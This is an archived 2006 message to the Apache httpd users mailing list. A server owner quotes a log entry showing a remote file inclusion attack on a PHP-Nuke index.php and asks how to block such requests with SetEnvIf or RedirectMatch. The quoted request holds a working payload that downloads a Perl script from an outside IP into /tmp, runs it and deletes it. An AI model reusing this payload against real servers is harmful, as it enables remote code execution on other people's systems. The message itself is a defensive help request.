Return-Path: Delivered-To: apmail-httpd-users-archive@www.apache.org Received: (qmail 787 invoked from network); 7 Aug 2006 23:01:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (209.237.227.199) by minotaur.apache.org with SMTP; 7 Aug 2006 23:01:41 -0000 Received: (qmail 5609 invoked by uid 500); 7 Aug 2006 23:01:31 -0000 Delivered-To: apmail-httpd-users-archive@httpd.apache.org Received: (qmail 5591 invoked by uid 500); 7 Aug 2006 23:01:31 -0000 Mailing-List: contact users-help@httpd.apache.org; run by ezmlm Precedence: bulk Reply-To: users@httpd.apache.org list-help: list-unsubscribe: List-Post: List-Id: Delivered-To: mailing list users@httpd.apache.org Received: (qmail 5577 invoked by uid 99); 7 Aug 2006 23:01:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (140.211.166.49) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 07 Aug 2006 16:01:31 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of dvelayos@gmail.com designates 64.233.182.190 as permitted sender) Received: from [64.233.182.190] (HELO nf-out-0910.google.com) (64.233.182.190) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 07 Aug 2006 16:01:29 -0700 Received: by nf-out-0910.google.com with SMTP id n28so4971nfc for ; Mon, 07 Aug 2006 16:01:08 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; b=oBFYA+yZewD/tSupp5KnV7Ig+eCZT+SA/KT8sxc+iN4t31EWoSNE5duUG/SaBJeQfngLE5nKeORc+8qMhUYQLouqma1WQwFIORewWWOFQmSpjHFv6X9pms0a7L8u25B27Hx3vHh9HRi8sHEVl/ZX4aYwP2E2BywLTDWiLjS8Qko= Received: by 10.49.29.2 with SMTP id g2mr70862nfj; Mon, 07 Aug 2006 16:01:08 -0700 (PDT) Received: from ?82.158.102.225? ( [82.158.102.225]) by mx.gmail.com with ESMTP id x24sm11803nfb.2006.08.07.16.01.07; Mon, 07 Aug 2006 16:01:07 -0700 (PDT) Message-ID: <44D7C632.7070904@gmail.com> Date: Tue, 08 Aug 2006 01:01:06 +0200 From: david User-Agent: Thunderbird 1.5.0.4 (Windows/20060516) MIME-Version: 1.0 To: users@httpd.apache.org Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Subject: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello! Recently, i've founded some entries on my apache webserver log like this: [IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? HTTP/1.0" 200 220151 "-" "Mozilla/5.0" As you can see, some attacker tries to use the index.php file to get a cmd.txt file from other site. are there any way to detect this urls to stop this configuring apache? i've tried with setEnvIf and RedirectMatch on several ways, with no results: SetEnvIf Request_URI "(.*)cmd(.*)$" attack or RewriteEngine on RedirectMatch permanent (.*)cmd(.*)$ http://nourl only works with urls like: http://myserver/myfile.php/cmd not with http://myserver/myfile.php?cmd It seems that te Request_URI and RedirectMatch doesn't works with the params on the URL, only with the main URL file. Thanks. David --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See for more info. To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org " from the digest: users-digest-unsubscribe@httpd.apache.org For additional commands, e-mail: users-help@httpd.apache.org